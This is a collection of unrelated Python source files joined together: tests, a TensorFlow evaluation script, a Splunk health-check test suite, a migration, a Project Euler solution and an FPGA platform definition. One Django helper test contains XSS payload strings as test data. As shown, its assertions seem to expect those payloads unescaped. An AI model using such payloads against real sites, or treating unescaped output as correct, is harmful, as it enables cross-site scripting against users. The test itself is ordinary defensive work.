with pytest.raises(ValueError):
zslice(data["q"][np.newaxis, ...], data["p"][np.newaxis, ...], p0=0)
def test_correct_results_3D(data, expected_results):
s50 = zslice(data["q"], data["p"], p0=-50)
np.testing.assert_almost_equal(s50, expected_results)
def test_correct_results_2D(data, expected_results):
K, I, J = data["q"].shape
s50 = zslice(data["q"].reshape(K, -1), data["p"].reshape(K, -1), p0=-50)
np.testing.assert_almost_equal(s50, expected_results.ravel())
def test_p0_outside_bounds(data):
with pytest.raises(ValueError):
K, I, J = data["q"].shape
zslice(data["q"], data["p"], p0=50)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import pytest
from olympia.users.models import UserProfile
from olympia.users.templatetags.jinja_helpers import user_link, users_list
pytestmark = pytest.mark.django_db
def test_user_link():
u = UserProfile(username='jconnor', display_name='John Connor', pk=1)
assert user_link(u) == (
'<a href="%s" title="%s">John Connor</a>' % (u.get_url_path(),
u.name))
# handle None gracefully
assert user_link(None) == ''
def test_user_link_xss():
u = UserProfile(username='jconnor',
display_name='<script>alert(1)</script>', pk=1)
html = "<script>alert(1)</script>"
assert user_link(u) == '<a href="%s" title="%s">%s</a>' % (
u.get_url_path(), html, html)
u = UserProfile(username='jconnor',
display_name="""xss"'><iframe onload=alert(3)>""", pk=1)
html = """xss"'><iframe onload=alert(3)>"""
assert user_link(u) == '<a href="%s" title="%s">%s</a>' % (
u.get_url_path(), html, html)
def test_users_list():
u1 = UserProfile(username='jconnor', display_name='John Connor', pk=1)
u2 = UserProfile(username='sconnor', display_name='Sarah Connor', pk=2)
assert users_list([u1, u2]) == ', '.join((user_link(u1), user_link(u2)))
# handle None gracefully
assert user_link(None) == ''
def test_short_users_list():
"""Test the option to shortened the users list to a certain size."""
# short list with 'others'
u1 = UserProfile(username='oscar', display_name='Oscar the Grouch', pk=1)
u2 = UserProfile(username='grover', display_name='Grover', pk=2)
u3 = UserProfile(username='cookies!', display_name='Cookie Monster', pk=3)
shortlist = users_list([u1, u2, u3], size=2)
assert shortlist == ', '.join((user_link(u1), user_link(u2))) + ', others'
def test_users_list_truncate_display_name():
u = UserProfile(username='oscar',
display_name='Some Very Long Display Name', pk=1)
truncated_list = users_list([u], None, 10)
assert truncated_list == (
u'<a href="%s" title="%s">Some Very...</a>' % (u.get_url_path(),
u.name))
def test_user_link_unicode():
"""make sure helper won't choke on unicode input"""
u = UserProfile.objects.create(
username=u'jmüller', display_name=u'Jürgen Müller')
assert user_link(u) == (
u'<a href="%s" title="%s">Jürgen Müller</a>' % (
u.get_url_path(), u.name))
u = UserProfile.objects.create(display_name=u'\xe5\xaf\x92\xe6\x98\x9f')
assert user_link(u) == (
u'<a href="%s" title="%s">%s</a>' % (u.get_url_path(), u.name,
u.display_name))
|
nilq/baby-python
|
python
|
from __future__ import division
import os
import pickle
import numpy as np
import blt_net.cascademv2.utils.benchmark_utils as benchmark_utils
import ntpath
import cv2
from blt_net.cascademv2.utils.general_utils import create_logger
import sys
import tensorflow as tf
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = '0' # set to 0 when only 1 GPU is available and 1 when 2 GPUs are available
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
def evaluate_model(cascademv2_config, model_path, model_name):
eval_cascademv2_config = cascademv2_config.clone()
model_path = eval_cascademv2_config.model_name
if not os.path.isfile(model_path):
print('Model {} does not exist. Skipping...'.format(model_path))
return
eval_cascademv2_config.img_input = eval_cascademv2_config.eval_im_input
out_path = os.path.join(eval_cascademv2_config.eval_output_root, 'raw_inference')
    os.makedirs(out_path, exist_ok=True)
    eval_cascademv2_config.out_path = out_path
logger = create_logger(eval_cascademv2_config.out_path, show_in_stdout=False)
print('Evaluating model {}'.format(model_path))
# ---------------------------------------------------------
with open(eval_cascademv2_config.eval_filename, 'rb') as fid:
val_data = pickle.load(fid)
# ---------------------------------------------------------
if cascademv2_config.steps == 2:
from blt_net.cascademv2.core.modes.model_2step import Model_2step
model = Model_2step()
else:
        raise NotImplementedError('Models with {} steps are not implemented'.format(cascademv2_config.steps))
model.initialize(eval_cascademv2_config, logger)
model.creat_model(eval_cascademv2_config, phase='inference')
model.load_model(model_path)
eval_model_on_dataset(model, eval_cascademv2_config, val_data)
benchmark_utils.convert_results(out_path, eval_cascademv2_config.eval_dataset_type)
def eval_model_on_dataset(model, cascademv2_config, val_data):
filenames = []
for f_index in range(len(val_data)):
filenames.append(val_data[f_index]['filepath'])
ind = np.argsort(filenames)
for f_index in range(len(ind)):
f_ind = ind[f_index]
filepath = val_data[f_ind]['filepath']
gt_arr = []
if 'bboxes' in val_data[f_ind].keys():
gt_arr = val_data[f_ind]['bboxes']
head, file_name = ntpath.split(filepath)
file_name = os.path.splitext(file_name)
file_name = file_name[0]
res_txt_filename = os.path.join(model.out_path, file_name + '.txt')
res_img_filename = ''
if cascademv2_config.create_image:
res_img_filename = os.path.join(model.out_path, file_name + '.png')
img = cv2.imread(filepath)
model.test_model(cascademv2_config, img, gt_arr=gt_arr, res_txt_filename=res_txt_filename, res_img_filename=res_img_filename)
def main(argv):
import argparse
from blt_net.cascademv2.config_cascademv2 import get_cfg_defaults
cascademv2_config = get_cfg_defaults()
parser = argparse.ArgumentParser(description='eval config.')
parser.add_argument('--cfg_path',
type=str,
required=False,
help='Path to YAML config file.')
args = parser.parse_args()
if args.cfg_path is None:
cascademv2_config.merge_from_file("./trainconfigs/citypersons_config.yaml")
else:
cascademv2_config.merge_from_file(args.cfg_path)
evaluate_model(cascademv2_config, cascademv2_config.out_path, cascademv2_config.model_name)
if __name__ == '__main__':
main(sys.argv[1:])
|
nilq/baby-python
|
python
|
'''
Extra operators used by MetaFunctions
'''
from operator import add, sub, truediv, mul
def concat(*args):
"concat(1, 2, 3) -> (1, 2, 3)"
return args
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.2 on 2019-09-27 00:54
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("dcodex", "0003_auto_20190920_1333"),
]
operations = [
migrations.AlterModelOptions(
name="manuscript",
options={"ordering": ["siglum", "name"]},
),
]
|
nilq/baby-python
|
python
|
import pytest
# stdlib
import json
import os
import unittest
from stackstate_checks.base.errors import CheckException
from stackstate_checks.splunk.client import TokenExpiredException
from stackstate_checks.splunk_health.splunk_health import SplunkHealth, Instance
from stackstate_checks.base.stubs import health, aggregator
from stackstate_checks.base import TopologyInstance
# Mark the entire module as tests of type `unit`
pytestmark = pytest.mark.unit
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'ci', 'fixtures')
def load_fixture(fixture_file):
with open(os.path.join(FIXTURE_DIR, fixture_file)) as f:
return json.loads(f.read())
class MockSplunkClient(object):
def __init__(self):
self._dispatch_parameters = None
self.invalid_token = False
def auth_session(self, committable_state):
if self.invalid_token:
raise TokenExpiredException("Current in use authentication token is expired. Please provide a valid "
"token in the YAML and restart the Agent")
return
def saved_searches(self):
return []
def saved_search_results(self, search_id, saved_search):
if search_id == "exception":
raise CheckException("maximum retries reached for saved search " + str(search_id))
# sid is set to saved search name
return [load_fixture("%s.json" % search_id)]
def dispatch(self, saved_search, splunk_app, ignore_saved_search_errors, parameters):
if saved_search.name == "dispatch_exception":
raise Exception("BOOM")
self._dispatch_parameters = parameters
return saved_search.name
def finalize_sid(self, search_id, saved_search):
return
class MockedInstance(Instance):
def __init__(self, *args, **kwargs):
super(MockedInstance, self).__init__(*args, **kwargs)
def _build_splunk_client(self):
return MockSplunkClient()
class MockedSplunkHealth(SplunkHealth):
def __init__(self, *args, **kwargs):
super(MockedSplunkHealth, self).__init__(*args, **kwargs)
def _build_instance(self, instance):
return MockedInstance(instance, self.init_config)
class TestSplunkCheck(unittest.TestCase):
CHECK_NAME = "splunk"
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [],
'collection_interval': 15
}
instance_key = TopologyInstance("splunk", "http://localhost:8089")
def setUp(self):
"""
Initialize and patch the check, i.e.
"""
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [self.instance])
health.reset()
aggregator.reset()
self.check.commit_state(None)
def test_no_topology_defined(self):
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id,
self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15},
{})
def test_health_data(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id, self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15}, {},
[{'checkStateId': u'disk_sda',
'health': 'CLEAR',
'message': u'disk sda is ok',
'name': u'disk sda usage',
'topologyElementIdentifier': u'component1'},
{'checkStateId': u'disk_sdb',
'health': 'CRITICAL',
'name': u'disk sdb usage',
'topologyElementIdentifier': u'component2'}
])
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 0)
def test_incomplete_health(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "incomplete_health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() != ''
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
def test_partially_incomplete(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "partially_incomplete_health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id, self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15}, {},
[{'checkStateId': u'disk_sda',
'health': 'CLEAR',
'message': u'disk sda is ok',
'name': u'disk sda usage',
'topologyElementIdentifier': u'component1'}
])
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 1)
self.assertEqual(service_checks[0].message,
"The saved search 'partially_incomplete_health' contained 1 incomplete records")
def test_wrong_health(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "wrong_health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id, self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15}, {},
[{'checkStateId': u'disk_sda',
'health': 'CLEAR',
'message': u'disk sda is ok',
'name': u'disk sda usage',
'topologyElementIdentifier': u'component1'}
])
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 1)
self.assertEqual(service_checks[0].message,
"The saved search 'wrong_health' contained 1 incomplete records")
def test_handle_saved_search_run_error(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "dispatch_exception",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert "BOOM" in self.check.run()
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
def test_ignore_saved_search_run_error(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "dispatch_exception",
"parameters": {}
}],
'ignore_saved_search_errors': True,
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
def test_default_parameters(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health"
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
assert self.check.instance_data.splunk_client._dispatch_parameters == {'dispatch.now': True,
'force_dispatch': True,
'output_mode': 'json'}
def test_non_default_parameters(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health"
}],
'collection_interval': 15
}
init_config = {
'default_parameters': {
'respect': 'me'
}
}
self.check = MockedSplunkHealth(self.CHECK_NAME, init_config, {}, [instance])
assert self.check.run() == ''
assert self.check.instance_data.splunk_client._dispatch_parameters == {'respect': 'me', 'output_mode': 'json'}
def test_non_default_parameters_override(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health",
"parameters": {
"respect": "me"
}
}],
'collection_interval': 15
}
init_config = {
'default_parameters': {
'default_should': 'be_ignore'
}
}
self.check = MockedSplunkHealth(self.CHECK_NAME, init_config, {}, [instance])
assert self.check.run() == ''
assert self.check.instance_data.splunk_client._dispatch_parameters == {'respect': 'me', 'output_mode': 'json'}
def test_check_valid_initial_token(self):
"""
Splunk topology check should work with valid initial token
"""
instance = {
'url': 'http://localhost:8089',
'authentication': {
'token_auth': {
'name': "admin",
'initial_token': "dsfdgfhgjhkjuyr567uhfe345ythu7y6tre456sdx",
'audience': "search",
'renewal_days': 10
}
},
'saved_searches': [],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
def test_check_invalid_initial_token(self):
"""
Splunk check should not work with invalid initial token and stop the check
"""
instance = {
'url': 'http://localhost:8089',
'authentication': {
'token_auth': {
'name': "admin",
'initial_token': "dsfdgfhgjhkjuyr567uhfe345ythu7y6tre456sdx",
'audience': "search",
'renewal_days': 10
}
},
'saved_searches': [],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
# Run once to initialize
assert self.check.run() == ''
aggregator.reset()
self.check.instance_data.splunk_client.invalid_token = True
assert self.check.run() == ''
msg = "Current in use authentication token is expired. Please provide a valid token in the YAML and restart " \
"the Agent"
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
self.assertEqual(service_checks[0].message, msg)
|
nilq/baby-python
|
python
|
import yaml
import logging
def read_yaml(path_to_yaml: str) -> dict:
with open(path_to_yaml) as yaml_file:
content = yaml.safe_load(yaml_file)
logging.info(f"yaml file: {path_to_yaml} loaded successfully")
return content
|
nilq/baby-python
|
python
|
from math import sqrt
import numpy as np
# tools used in production
# ---------------------------------------------------------------------------------------------
def combine_mean_std(l_n, l_mean, l_std):
"""
Ref: https://www.statstodo.com/index.php and
Altman DG, Machin D, Bryant TN and Gardner MJ. (2000)
Statistics with Confidence Second Edition.
BMJ Books ISBN 0 7279 1375 1. p. 28-31
:param l_n: the sample size of each group
:param l_mean: the mean value of each group
:param l_std: the standard deviation value of each group
:return: Combined sample size, mean value and standard deviation value
"""
l_sum_x = [n * mean for n, mean in zip(l_n, l_mean)]
l_sum_x2 = [sd ** 2 * (n - 1) + sum_x ** 2 / n for n, sd, sum_x in zip(l_n, l_std, l_sum_x)]
tn, tx, txx = sum(l_n), sum(l_sum_x), sum(l_sum_x2)
return tn, tx / tn, sqrt((txx - tx ** 2 / tn) / (tn - 1))
def remove_eta_phi(x):
"""
    used by algs `DecayModeLSTMNoEtaPhi`
    :param x: torch.Tensor of shape (batch, sequence, features)
    :return: contiguous torch.Tensor with feature indices 0 and 2 (eta and phi) removed
    """
return x[:, :, [i for i in range(x.size()[2]) if i != 0 and i != 2]].contiguous()
# useful NumPy manipulation, not used in production (!)
# ---------------------------------------------------------------------------------------------
def log10(arr, epsilon=0.0):
"""
:param arr: np.ndarray
:param epsilon: constant preventing log10(0)
:return: np.ndarray
"""
masked = np.ma.masked_equal(arr, 0)
masked = np.log10(np.maximum(masked, epsilon))
return masked.filled(0)
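# --- Sanity-check sketch (illustrative only; not used in production) ---
# Combining the statistics of two halves of a sample must reproduce the
# statistics of the whole sample. The formula assumes sample standard
# deviations (ddof=1), as in the referenced derivation.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    a, b = rng.normal(size=40), rng.normal(size=60)
    full = np.concatenate([a, b])
    n, mean, std = combine_mean_std(
        [a.size, b.size],
        [a.mean(), b.mean()],
        [a.std(ddof=1), b.std(ddof=1)],
    )
    assert n == full.size
    assert np.isclose(mean, full.mean())
    assert np.isclose(std, full.std(ddof=1))
    # log10 keeps zeros at zero and clips small positive values at `epsilon`
    print(log10(np.array([0.0, 0.5, 100.0]), epsilon=1e-3))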
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from helper import IcebergUnitTestCase
class ClientAddresses(IcebergUnitTestCase):
def test_create(self):
"""
Create an address for the user
"""
self.login()
self.create_user_address()
def test_read(self):
"""
Try to fetch the address created before
"""
self.login()
addresses = self.api_handler.me().addresses()
self.assertNotEqual(len(addresses), 0)
|
nilq/baby-python
|
python
|
"""Create organisation table
Revision ID: ba9997532100
Revises:
Create Date: 2021-11-08 14:36:59.635469
"""
import sqlalchemy as sa
# revision identifiers, used by Alembic.
from app.db.utils import UtcNow
from alembic import op
revision = "ba9997532100"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"Organisations",
sa.Column("OrganisationID", sa.String(length=64), primary_key=True),
sa.Column("Name", sa.VARCHAR(255), index=True, nullable=False, unique=True),
sa.Column("Created", sa.DateTime(), nullable=False, server_default=UtcNow()),
sa.Column(
"Updated",
sa.DateTime(),
nullable=False,
server_default=UtcNow(),
onupdate=UtcNow(),
),
sa.PrimaryKeyConstraint("OrganisationID"),
)
def downgrade():
op.drop_table("Organisations")
|
nilq/baby-python
|
python
|
# trivial example: 30/50 = 3/5
# non-trivial example: 49/98 = 4/8 (naively "cancelling" the 9s happens to give the correct value)
# There are exactly four non-trivial fractions of this kind: less than 1, with
# two-digit numerator and denominator. Find the product of these four fractions
# reduced to its lowest common terms: what is the denominator?
import timeit
import itertools
from functools import reduce
from operator import truediv
try:
range = xrange
except NameError:
pass
start = timeit.default_timer()
def gcd(a, b):
if a % b == 0:
return b
return gcd(b, a % b)
def euler_33():
numerators = denominators = 1
fractions = (f for f in itertools.combinations(range(10, 100), 2)
if not any(i % 10 == 0 or i % 11 == 0 for i in f))
floordiv = lambda v: v // 10
mod = lambda v: v % 10
for fraction in fractions:
numerator, denominator = fraction
if mod(numerator) == mod(denominator):
ops = (floordiv, floordiv)
elif mod(numerator) == floordiv(denominator):
ops = (floordiv, mod)
elif floordiv(numerator) == mod(denominator):
ops = (mod, floordiv)
elif floordiv(numerator) == floordiv(denominator):
ops = (mod, mod)
else: continue
numerator, denominator = ops[0](numerator), ops[1](denominator)
if truediv(numerator, denominator) == reduce(truediv, fraction):
numerators *= fraction[0]
denominators *= fraction[1]
return denominators / gcd(denominators, numerators)
print('Answer: {}'.format(euler_33()))
stop = timeit.default_timer()
print('Time: {0:9.5f}'.format(stop - start))
|
nilq/baby-python
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('assignments/', views.AssignmentListView.as_view(), name='assignments'),
path('assignment/<int:pk>', views.AssignmentDetailView.as_view(), name='assignment-detail'),
path('units/', views.UnitListView.as_view(), name='units'),
path('unit/<int:pk>', views.UnitDetailView.as_view(), name='unit-detail'),
]
|
nilq/baby-python
|
python
|
from stormed.method.codegen.tx import *
|
nilq/baby-python
|
python
|
from litex.build.generic_platform import *
from litex.build.xilinx import XilinxPlatform, XC3SProg
_io = [
#OSC
("clk_50", 0, Pins("T7"), IOStandard("LVCMOS33")),
# RESET
("resetn", 0, Pins("C3"), IOStandard("LVCMOS33"), Misc("PULLDOWN")), #UNUSED PIN
# EVERLOOP CONTROL
("everloop_ctl", 0, Pins("A9"), IOStandard("LVCMOS33")),
#######################
# RPi SPI BUS
#######################
("rpi_sck" , 0, Pins("R9"), IOStandard("LVCMOS33")),
("rpi_mosi" , 0, Pins("M10"), IOStandard("LVCMOS33")),
("rpi_miso" , 0, Pins("M9"), IOStandard("LVCMOS33")),
("rpi_ss" , 0, Pins("N9"), IOStandard("LVCMOS33")),
("spiflash", 0,
Subsignal("cs_n", Pins("T3")),
Subsignal("clk", Pins("R11")),
Subsignal("mosi", Pins("T10")),
Subsignal("miso", Pins("P10"), Misc("PULLUP")),
IOStandard("LVCMOS33"), Misc("SLEW=FAST")),
#######################
# ESP32 SPI BUS
#######################
("esp_sck" , 0, Pins("B3"), IOStandard("LVCMOS33")), #ESP_IO32
("esp_mosi" , 0, Pins("C5"), IOStandard("LVCMOS33")), #ESP_IO33
("esp_miso" , 0, Pins("K6"), IOStandard("LVCMOS33")), #ESP_IO21
("esp_ss" , 0, Pins("L3"), IOStandard("LVCMOS33")), #ESP_IO23
("EN_ESP" , 0, Pins("A4"), IOStandard("LVCMOS33")),
("EN_PROG_ESP" , 0, Pins("F3"), IOStandard("LVCMOS33")),
("ESP_TX" , 0, Pins("L5"), IOStandard("LVCMOS33")),
("ESP_RX" , 0, Pins("K5"), IOStandard("LVCMOS33")),
("GPIO_24" , 0, Pins("A14"), IOStandard("LVCMOS33"), Misc("PULLUP")), #RPI_GPIO24 to EN_PROG_ESP
("GPIO_25" , 0, Pins("B14"), IOStandard("LVCMOS33"), Misc("PULLUP")) ,#RPI_GPIO25 to EN_ESP
("serial", 0,
Subsignal("tx" , Pins("A12")),
Subsignal("rx" , Pins("B12")),
IOStandard("LVCMOS33")
),
# NET "GPIO_12" LOC = "N8" | IOSTANDARD = LVCMOS33 ;
# NET "GPIO_16" LOC = "P8" | IOSTANDARD = LVCMOS33 ;
#######################
# AUDIO OUTPUT
#######################
("dac_output<0>", 0, Pins("E1"), IOStandard("LVCMOS33")),
("dac_output<1>", 0, Pins("F1"), IOStandard("LVCMOS33")),
("dac_volumen" , 0, Pins("C1"), IOStandard("LVCMOS33")),
("dac_mute" , 0, Pins("B1"), IOStandard("LVCMOS33")),
("dac_hp_nspk" , 0, Pins("D1"), IOStandard("LVCMOS33")),
#NET "hp_detect" LOC = "T4" | IOSTANDARD = LVCMOS33;
#######################
# MIC ARRAY #
#######################
("pdm_clk" , 0, Pins("B5"), IOStandard("LVCMOS33")),
("pdm_data<0>", 0, Pins("E6"), IOStandard("LVCMOS33")),
("pdm_data<1>", 0, Pins("B8"), IOStandard("LVCMOS33")),
("pdm_data<2>", 0, Pins("A8"), IOStandard("LVCMOS33")),
("pdm_data<3>", 0, Pins("C7"), IOStandard("LVCMOS33")),
("pdm_data<4>", 0, Pins("A7"), IOStandard("LVCMOS33")),
("pdm_data<5>", 0, Pins("A6"), IOStandard("LVCMOS33")),
("pdm_data<6>", 0, Pins("B6"), IOStandard("LVCMOS33")),
("pdm_data<7>", 0, Pins("A5"), IOStandard("LVCMOS33")),
("mic_irq<0>" , 0, Pins("R7"), IOStandard("LVCMOS33")), #RPI_GPIO6
("mic_irq<1>" , 0, Pins("H4"), IOStandard("LVCMOS33")), #ESP_IO5
#######################
# EXP-CONN #
#######################
("gpio_io<15>", 0, Pins("R2"), IOStandard("LVCMOS33")),
("gpio_io<14>", 0, Pins("R1"), IOStandard("LVCMOS33")),
("gpio_io<13>", 0, Pins("P2"), IOStandard("LVCMOS33")),
("gpio_io<12>", 0, Pins("P1"), IOStandard("LVCMOS33")),
("gpio_io<11>", 0, Pins("N1"), IOStandard("LVCMOS33")),
("gpio_io<10>", 0, Pins("M2"), IOStandard("LVCMOS33")),
("gpio_io<9>" , 0, Pins("M1"), IOStandard("LVCMOS33")),
("gpio_io<8>" , 0, Pins("L1"), IOStandard("LVCMOS33")),
("gpio_io<7>" , 0, Pins("K2"), IOStandard("LVCMOS33")),
("gpio_io<6>" , 0, Pins("K1"), IOStandard("LVCMOS33")),
("gpio_io<5>" , 0, Pins("J3"), IOStandard("LVCMOS33")),
("gpio_io<4>" , 0, Pins("J1"), IOStandard("LVCMOS33")),
("gpio_io<3>" , 0, Pins("H2"), IOStandard("LVCMOS33")),
("gpio_io<2>" , 0, Pins("H1"), IOStandard("LVCMOS33")),
("gpio_io<1>" , 0, Pins("G3"), IOStandard("LVCMOS33")),
("gpio_io<0>" , 0, Pins("G1"), IOStandard("LVCMOS33")),
#DDR2 pins
("ddram_clock", 0,
Subsignal("p", Pins("G12")),
Subsignal("n", Pins("H11")),
IOStandard("MOBILE_DDR")),
("ddram", 0,
Subsignal("a", Pins("H15 H16 F16 H13 C16 J11 J12 F15 F13 F14 C15 G11 D16")), #13 pins
Subsignal("ba", Pins("G14 G16")), #2 pins
Subsignal("cke", Pins("D14")),
Subsignal("ras_n", Pins("J13")),
Subsignal("cas_n", Pins("K14")),
Subsignal("we_n", Pins("E15")),
Subsignal("dq", Pins("L14 L16 M15 M16 J14 J16 K15 K16 P15 P16 R15 R16 T14 T13 R12 T12")), #16 pins
Subsignal("dqs", Pins("N14 R14")), #2 pins #LDQS+ & UDQS+ : Check on this
Subsignal("dm", Pins("K11 K12")), #2 pins- LDM UDM : Check on this
IOStandard("MOBILE_DDR")
)
]
_connectors = [
]
class Platform(XilinxPlatform):
name = "matrix_voice"
default_clk_name = "clk_50"
default_clk_period = 20 #ns- as advised by Andres
# The MATRIX Voice has a XC6SLX9 which bitstream takes up ~2.6Mbit (1484472 bytes)
# 0x80000 offset (4Mbit) gives plenty of space
gateware_size = 0x80000
# MX25L6406E - component
# 16Mb - 75 MHz clock frequency
# FIXME: Create a "spi flash module" object in the same way we have SDRAM
# module objects.
# /* name, erase_cmd, chip_erase_cmd, device_id, pagesize, sectorsize, size_in_bytes */
# FLASH_ID("st m25p16", 0xd8, 0xc7, 0x00152020, 0x100, 0x10000, 0x200000),
spiflash_model = "25l6406e" #mx25l6406e
    spiflash_read_dummy_bits = 4
spiflash_clock_div = 4
spiflash_total_size = int((64/8)*1024*1024) # 64Mbit
spiflash_page_size = 256 #256 bytes
    spiflash_sector_size = 0x01000 # 2048 equal sectors, 4 kB each
def __init__(self): #maybe include self, programmer="xc3sprog" since we use that to flash bit file to MATRIX Voice
XilinxPlatform.__init__(self, "xc6slx9-2ftg256", _io, _connectors)
#XC3SProg("matrix_voice")
def create_programmer(self):
raise NotImplementedError
|
nilq/baby-python
|
python
|
"""Infer properties of TensorFlow nodes.
"""
from lucid.misc.graph_analysis.overlay_graph import OverlayNode, OverlayGraph
import tensorflow as tf
def as_tensor(t):
if isinstance(t, OverlayNode):
return t.tf_node
elif isinstance(t, tf.Operation):
return t.outputs[0]
elif isinstance(t, tf.Tensor):
return t
def infer_data_format(t):
"""Infer data_format of a conv net activation.
Inputs:
t: a tf.Tensor, tf.Op, or OverlayNode
Returns: "NHWC", "NCHW", or None
"""
if str(t.shape) == "<unknown>" or len(t.shape) != 4:
return None
next_candidates = [as_tensor(t)]
    for n in range(5):  # 5 is an arbitrary sanity limit on recursion depth
inps = []
for t in next_candidates:
            # Easiest way to find out whether an op carries the attribute is to just try
            try:
                return t.op.get_attr("data_format").decode("ascii")
            except ValueError:  # op has no data_format attribute
                inps.extend(t.op.inputs)
next_candidates = inps
return None
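# --- Usage sketch (illustrative only) ---
# Builds a tiny conv graph and recovers the data_format recorded on the op.
# Written for TF1-style graphs (tf.placeholder / tf.layers), which is what
# lucid targets; the layer parameters are arbitrary assumptions.
if __name__ == "__main__":
    graph = tf.Graph()
    with graph.as_default():
        x = tf.placeholder(tf.float32, [1, 28, 28, 3])
        y = tf.layers.conv2d(x, filters=4, kernel_size=3)
    print(infer_data_format(y))  # -> "NHWC"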
|
nilq/baby-python
|
python
|
"""
ABOTS: A Bunch Of Tiny Scripts
==============================
The name of this project explains what it is, a bunch of tiny scripts.
I find myself thinking of many different projects that all require some core
functionality that many other projects can share.
However, it must be laid down first before adding the "unique" code that my
ideas consist of.
The usual approach to this issue is using an existing framework someone else
wrote, but then you need to understand how that framework does things and
shape your application to fit that mindset.
In addition, you now have a black box in your application that you do not 100%
understand, which adds another layer of abstraction that makes debugging
issues that much harder (we all make bugs, and so do framework devs).
With that being said, ideologically I do not like using existing frameworks
since that deprives me of the opportunity to learn how that particular piece of
software works.
So ABOTS is my approach of making a shared library of code that I want to use
in other projects.
Any improvements here can then improve my other projects, as well as give me
something small to work on when I am in-between projects that could eventually
be useful later on.
The ideas of these scripts are to be as modular as possible so that they can be
used in a variety of different projects with little changes needed.
Due to the nature of the project, this will probably not be too useful for
other developers who are not me, but it could be useful for seeing how a
particular component of ABOTS works, since the project is optimized for
versatility and simplicity rather than for raw efficiency at the expense of
being harder to understand.
Now that you know what lies here, proceed with caution.
You have been warned.
~aewens
"""
|
nilq/baby-python
|
python
|
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['DismissCard', 'DismissCardInterface']
class DismissCardInterface(ApiInterfaceBase):
card_id: int
image_url: str
title: AnyType
message: AnyType
button_text: AnyType
camera_target: AnyType
face_filter_id: AnyType
class DismissCard(PropertyMapper, DismissCardInterface):
pass
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 1 15:52:30 2020
@author: liu
"""
NAME = 'FCS'
